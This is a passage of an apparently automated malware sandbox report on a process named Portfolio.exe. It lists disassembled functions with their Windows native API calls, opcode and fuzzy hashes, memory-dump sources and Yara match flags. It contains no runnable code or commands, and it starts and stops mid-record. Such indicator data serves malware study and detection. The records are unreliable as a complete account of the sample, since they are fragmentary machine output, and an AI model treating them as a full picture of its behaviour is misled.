API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5e3e281a5c8d420c326ef68ddb30770a3bb19891bca8404868f3e9b5d3e03eb1
Instruction ID: f0b50d0ab5721280065db2d65c311e01c15c0065a82be3c9691847021f2dcd4a
Opcode Fuzzy Hash: 5e3e281a5c8d420c326ef68ddb30770a3bb19891bca8404868f3e9b5d3e03eb1
Instruction Fuzzy Hash: 4F113AB19047488FDB10DFAAC5447DEFBF4AB88324F14881ED519A7240DB78A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EBDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 019EBE0E

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8e9a7f56a2465c5201b2c6449411f752ec9bb3ac5050c0eaf1d9d4eefe13b88d
Instruction ID: d8ad5fbcfd942718a3b48df04e639ab0b50bd738e063fd06558f347eaf93fc76
Opcode Fuzzy Hash: 8e9a7f56a2465c5201b2c6449411f752ec9bb3ac5050c0eaf1d9d4eefe13b88d
Instruction Fuzzy Hash: 021110B1C003498FDB10CF9AC548BDEFBF8EB88224F10841ED959A7200D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EDEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 019EDF1D

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d902066e0ab926bcbf23b218e8d000eb3599b3765a3b778aec4e558b77cab95a
Instruction ID: f4d2c3f0cd7fdee72417f8a0785ebcf1b0734a11357fd192d8f83e8e803c21e0
Opcode Fuzzy Hash: d902066e0ab926bcbf23b218e8d000eb3599b3765a3b778aec4e558b77cab95a
Instruction Fuzzy Hash: 6E1112B58003098FDB10CF99D588BDEFBF8EB48324F10841AE959A3300C378AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01AD5130, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 01AD518D

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 63ff9b970fd0677e93862729986930147c8fd46449dea4586fd8964b80592e0e
Instruction ID: d4e37fff652514e9f6dbdde23000f65147c42aa153d652a84bd1f93611cae6c0
Opcode Fuzzy Hash: 63ff9b970fd0677e93862729986930147c8fd46449dea4586fd8964b80592e0e
Instruction Fuzzy Hash: D91115B58003099FDB10DF99C984BDEFFF8EB48324F108419E955A3200C374AA84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EDEB9, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 019EDF1D

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1a3b70278e3439e0124ce262dded7d59adb78497b595a9115ba3ff8b144fe0d1
Instruction ID: 698953efcee37d75de2887543229e6785aae4584f3f6a35d19caa75e286e3280
Opcode Fuzzy Hash: 1a3b70278e3439e0124ce262dded7d59adb78497b595a9115ba3ff8b144fe0d1
Instruction Fuzzy Hash: B811E5B5900209CFDB10CF99D585BDEFBF8FB48324F15891AE959A7640C378AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0169D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249428157.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8434a905f43880b561ee0e5873fd994809ee53730036ca0f55d3b2a251c1b9
Instruction ID: 65bf1d5cc8b214dc89231ef04e0388c6ca8d95f5b2ff358324f0c58c83381fc3
Opcode Fuzzy Hash: 9b8434a905f43880b561ee0e5873fd994809ee53730036ca0f55d3b2a251c1b9
Instruction Fuzzy Hash: 172103B1508244DFDF15CF64D9C0B26BB69FB84258F24C579E90A4B346C73BD847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0169D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249428157.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c80c8947422c52d95326f7226fdb30fd591f1fe6205b8df3e646497a23d81a
Instruction ID: 064d5e4bced5b407f11223a552aeaface55ccf25cb3cadd817cfcf977d89a4cf
Opcode Fuzzy Hash: 44c80c8947422c52d95326f7226fdb30fd591f1fe6205b8df3e646497a23d81a
Instruction Fuzzy Hash: 3C21F5B1504244EFDF05DF94D9C0B26BB69FB84328F24C5BDEA094B346C736D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0169D006, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249428157.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad4c6107bc8c1dac9991caf9e0bb5d62eabf9d999858fce0a247965fba8e735
Instruction ID: 8380aa0f0667c5d388c203307b100aa80e46687120c77a86094f1f1b77dc379f
Opcode Fuzzy Hash: 2ad4c6107bc8c1dac9991caf9e0bb5d62eabf9d999858fce0a247965fba8e735
Instruction Fuzzy Hash: 3821C275408380DFCB02CF14D990B11BFB5EB46314F24C5EAD8458B297C33AD806CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0169D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249428157.000000000169D000.00000040.00000001.sdmp, Offset: 0169D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cac04d20d57e68ec8c54170f596d09b5c829b2fe472d02dbf1630bf68f133f8
Instruction ID: d6da40774c2f9ff457b749852ce155d58e6548e9ec0207a06665c820b2f0df6d
Opcode Fuzzy Hash: 7cac04d20d57e68ec8c54170f596d09b5c829b2fe472d02dbf1630bf68f133f8
Instruction Fuzzy Hash: B111BB75904284DFCF02CF54C9C0B15BBB1FB84224F28C6ADD9494B796C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01AD34E8, Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

{wt\, xrefs: 01AD362A

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID: {wt\
API String ID: 0-3846842233
Opcode ID: 55544c14f5f1c63ada175fb588bfcadc7ee83360ffb633d02b4bb31609ab4efc
Instruction ID: 3c1c193e6a2d4d6f1b833b0fbe40ab7c08d1d1c742f2a8ba7b20276a10519318
Opcode Fuzzy Hash: 55544c14f5f1c63ada175fb588bfcadc7ee83360ffb633d02b4bb31609ab4efc
Instruction Fuzzy Hash: 0B91E2B4E056099FCF04CFA9D9415AEBBF2FF89200F64942AD40ABB314DB309A41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 019EC2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbd072078e50140e3acae5137340c335d7acc77a501d2c1e8f3bc33e8afddb5
Instruction ID: 531320f3bc0cfd17a1f09a920a127b3a3315a9370c1752f8d9b904367c54ed4e
Opcode Fuzzy Hash: 3fbd072078e50140e3acae5137340c335d7acc77a501d2c1e8f3bc33e8afddb5
Instruction Fuzzy Hash: B65268B9900B068FD731DF94E8CC1997BB1FB41328F91420CD1A59BA99E3B4A56BCF44

Uniqueness

Uniqueness Score: -1.00%

Function 01AD6930, Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c91f78815b9e19bc8eb3fb1e41e8268310d37c762b55282436cead335b4011
Instruction ID: f201197a0b8136fe0e706d62c6bc9ec8f9c5d7e48ead6f2a8b77eac111d7b3ef
Opcode Fuzzy Hash: 00c91f78815b9e19bc8eb3fb1e41e8268310d37c762b55282436cead335b4011
Instruction Fuzzy Hash: 79E1CC70701A058FEB2ADB7AC550BAABBF6AF89704F14846DC14ACB291DF35E805CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019E9968, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249740699.00000000019E0000.00000040.00000001.sdmp, Offset: 019E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aff3c4cfad7dcba168498c4061dd79a23f9321557527558ee5ddba9f170f43e
Instruction ID: f937dca489c380c4bfca13d0cbcdd788e1f856d85a4aeedd89ab00f0391f544d
Opcode Fuzzy Hash: 7aff3c4cfad7dcba168498c4061dd79a23f9321557527558ee5ddba9f170f43e
Instruction Fuzzy Hash: 27A16232E0061A8FCF16DFB5C9445DDBBF6FF85301B15856AE90ABB261EB319905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01AD07D8, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523d1c87fff20643853606237d41aa4518b345c87f58edac0b170aaa963f1e6f
Instruction ID: e4a1cc210835b88f9863c32d84dab7497d72decf486a2a6961a7d62c1975c7f5
Opcode Fuzzy Hash: 523d1c87fff20643853606237d41aa4518b345c87f58edac0b170aaa963f1e6f
Instruction Fuzzy Hash: 0A215E70E156089FDB49CF6AD94159EFBF3AFC9200F14C16AE409A7219DB3059418B91

Uniqueness

Uniqueness Score: -1.00%

Function 01AD07E8, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb00b26c29acd2b306a32e73dd2578437a7681a306d9c3d1f56b0a4ddbf39441
Instruction ID: ca3df9c9c470124391c40836ba72e67e6b85765c03818a4f832821b82381b3f3
Opcode Fuzzy Hash: bb00b26c29acd2b306a32e73dd2578437a7681a306d9c3d1f56b0a4ddbf39441
Instruction Fuzzy Hash: B4212871E116199BEB48CFAAD9416EEFBF7FFC9200F14C13AE409A7214DB305A058B91

Uniqueness

Uniqueness Score: -1.00%

Function 01AD6E20, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5412917c11e7e276f2617f1762ff80c92ab2eb79b58ad25de04717f873b7d473
Instruction ID: 6ecfd7e3530e6049fb0a73399b0a839a5374d61db0d3383a585d999c7760cfef
Opcode Fuzzy Hash: 5412917c11e7e276f2617f1762ff80c92ab2eb79b58ad25de04717f873b7d473
Instruction Fuzzy Hash: AD113970D052588FDB14CFA9C818BEEBBF1AB4E301F18946AD516B3290CB789944CB78

Uniqueness

Uniqueness Score: -1.00%

Function 01AD6E10, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249808821.0000000001AD0000.00000040.00000001.sdmp, Offset: 01AD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f918498af30f9967138953ad88f93394abe22529855779f15fa14229f86c82a9
Instruction ID: 82d28212ccd571ef382cba4c1739d247f558fd59f169c6ad3ff0b10265621a22
Opcode Fuzzy Hash: f918498af30f9967138953ad88f93394abe22529855779f15fa14229f86c82a9
Instruction Fuzzy Hash: B91148B1D452588BDB158FA4C918BFDBBF0BB0A301F18946AD446B3290CB799944CB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Portfolio.exe PID: 2964 Parent PID: 5880 Portfolio.exeCOMMON

Executed Functions

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 72bb0f2720b067ad9fe34bce39431967512ad976f531b497edf89b182345a2a3
Instruction ID: db7dd721a22e575db8b7cfa99c358c938e8d836829346b0525244733bf79e53f
Opcode Fuzzy Hash: 72bb0f2720b067ad9fe34bce39431967512ad976f531b497edf89b182345a2a3
Instruction Fuzzy Hash: 68F0E7B2210208ABCB18DF89CC81DEB77E9EF8C754F058659FE0D97251D630E9518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E4D, 00419E54
BMA, xrefs: 00419E32, 00419E40

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 04f277423ad1ecc33428d6e79d64bc81965d11a15ed3b0c76127d9de6191fb29
Instruction ID: 67918e621a8ec3f5bb46f9d4527417802742ec27952e50c9c13f3c0018fef888
Opcode Fuzzy Hash: 04f277423ad1ecc33428d6e79d64bc81965d11a15ed3b0c76127d9de6191fb29
Instruction Fuzzy Hash: A6F027B11001486BDB00DF59CC80CD7BBA8EF48264B088A5EF94C93202C230D850CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d729e69081f0c5552eb7d2f7c1bdd702bbf0a0c0781ae1bf043e2f53bfd7b8ec
Instruction ID: 93cb16da66b33c8ebf77b028922c267f7feb7dfee6c5613e359c23536d916405
Opcode Fuzzy Hash: d729e69081f0c5552eb7d2f7c1bdd702bbf0a0c0781ae1bf043e2f53bfd7b8ec
Instruction Fuzzy Hash: 13E0C276200210ABD714EF94CC84FD77B29EF44324F058499FA5C5B242C130E514CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 019C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C99AA

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e124bfb989d2751b5f0b0a6c219d1980ed8c37919573c025cc43cebf546bc42
Instruction ID: a3ef97224826842b852f2944bca42f3bd50c8f1e268cc4a680913441d8dea63d
Opcode Fuzzy Hash: 1e124bfb989d2751b5f0b0a6c219d1980ed8c37919573c025cc43cebf546bc42
Instruction Fuzzy Hash: 799002A178110442D10061A94414B064085E7E1341F51C015E1094558DC659CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 019C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C95DA

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f64dc43a1bc929f28bc3a52b998075ba40ec1654f2cd9addb37bc3ce9d92a3e1
Instruction ID: 455aefcbc763098d49ffbc3fe4ab73eba2daead072d9a37bdfa8d415d1aab5c8
Opcode Fuzzy Hash: f64dc43a1bc929f28bc3a52b998075ba40ec1654f2cd9addb37bc3ce9d92a3e1
Instruction Fuzzy Hash: 149002A164210003410571A94414616808AA7E0241F51C021E1044594DC56588917165

Uniqueness

Uniqueness Score: -1.00%

Function 019C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C991A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1add8b74c6f0115900bc511530b946cd0711b9184afa36f733a5e3093cdd788
Instruction ID: 003c1a09e9c416dd4c0a39f75c0eeeb9444442890125d30ff9e103d6d86262ef
Opcode Fuzzy Hash: d1add8b74c6f0115900bc511530b946cd0711b9184afa36f733a5e3093cdd788
Instruction Fuzzy Hash: 6F9002B164110402D14071A944047464085A7D0341F51C011A5094558EC6998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 019C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C954A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49a4c17cafb469763ed497e0245818067bf0c3a06fc168a6b0235f1abf3d6317
Instruction ID: cefbe54ca14a528fe9678c624522aad3185bd746b8b06c2c361335d7c3d65a56
Opcode Fuzzy Hash: 49a4c17cafb469763ed497e0245818067bf0c3a06fc168a6b0235f1abf3d6317
Instruction Fuzzy Hash: 7D900475751100030105F5FD070450740C7F7D53D1751C031F1045554CD771CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 019C98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C98FA

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50779cd8fce33dfaed89ca73b5af39184ecdee302d9dcfade31c57d692bf859a
Instruction ID: 0f3db7682be9ce264d1a5e29de78f2fdcbfc16025f96d4b63357e93a82b845e5
Opcode Fuzzy Hash: 50779cd8fce33dfaed89ca73b5af39184ecdee302d9dcfade31c57d692bf859a
Instruction Fuzzy Hash: 14900261A4110502D10171A94404616408AA7D0281F91C022A1054559ECA658992B171

Uniqueness

Uniqueness Score: -1.00%

Function 019C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C984A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df31b844b186ad7a1966bd9ad7f0c72c2708a3308375466fb0f638c9018d6fbb
Instruction ID: 0293e048163a02970fb7bae49d413e24aecdcf0bc1ed8ecb27e8c02fc35dea6e
Opcode Fuzzy Hash: df31b844b186ad7a1966bd9ad7f0c72c2708a3308375466fb0f638c9018d6fbb
Instruction Fuzzy Hash: 3B900261682141525545B1A944045078086B7E0281B91C012A1444954CC5669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 019C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C986A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea940092aa5cbb5e5694aa73a0bc117e4b1fbfa2836f544af537c68530c75161
Instruction ID: 45e35d6b1c98e611c2a99b30477e8281b8edae8b85c3a9a45c0a757c43ff637f
Opcode Fuzzy Hash: ea940092aa5cbb5e5694aa73a0bc117e4b1fbfa2836f544af537c68530c75161
Instruction Fuzzy Hash: 2790027164110413D11161A945047074089A7D0281F91C412A045455CDD6968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 019C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C978A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 90ac1503552f8eed06a09e6e07c47bdefdefdf93423a222b7ea0d6bfbfa81a87
Instruction ID: d7c093e641582667d5515726a16e47ff04236ce679ddcd5c1d3535e32beb5b90
Opcode Fuzzy Hash: 90ac1503552f8eed06a09e6e07c47bdefdefdf93423a222b7ea0d6bfbfa81a87
Instruction Fuzzy Hash: A390026965310002D18071A9540860A4085A7D1242F91D415A004555CCC95588696361

Uniqueness

Uniqueness Score: -1.00%

Function 019C97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C97AA

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ecb2327b35e3966af189a15178943e0e8cc84799913d61693619786beb04e89
Instruction ID: 292ac490efc270ea01e7d9ff09c4f17fbeeeb0de3fa022bbb430dbf2db4090b1
Opcode Fuzzy Hash: 0ecb2327b35e3966af189a15178943e0e8cc84799913d61693619786beb04e89
Instruction Fuzzy Hash: C590026174110003D14071A954186068085F7E1341F51D011E0444558CD95588566262

Uniqueness

Uniqueness Score: -1.00%

Function 019C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C971A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63aa448e21fc573b8710c9f4d5748f9f7d97ffead2b3d3e10daf3ce789bee0ef
Instruction ID: e3140f676166973fd4819b329e8fd7a6491a30121635bed68454aa4707f39eb7
Opcode Fuzzy Hash: 63aa448e21fc573b8710c9f4d5748f9f7d97ffead2b3d3e10daf3ce789bee0ef
Instruction Fuzzy Hash: F190027164110402D10065E954086464085A7E0341F51D011A5054559EC6A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 019C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C96EA

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66fa7f665de913c09967fff5dd84bc110118f9c0f685742efc6e670c1f910e3a
Instruction ID: 1f2a44d4d93a3bcab4437ce6670ba4127dedab7fa72e2ad2e618b3d0cc598c81
Opcode Fuzzy Hash: 66fa7f665de913c09967fff5dd84bc110118f9c0f685742efc6e670c1f910e3a
Instruction Fuzzy Hash: C590027164118802D11061A9840474A4085A7D0341F55C411A445465CDC6D588917161

Uniqueness

Uniqueness Score: -1.00%

Function 019C9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C9A0A

Memory Dump Source

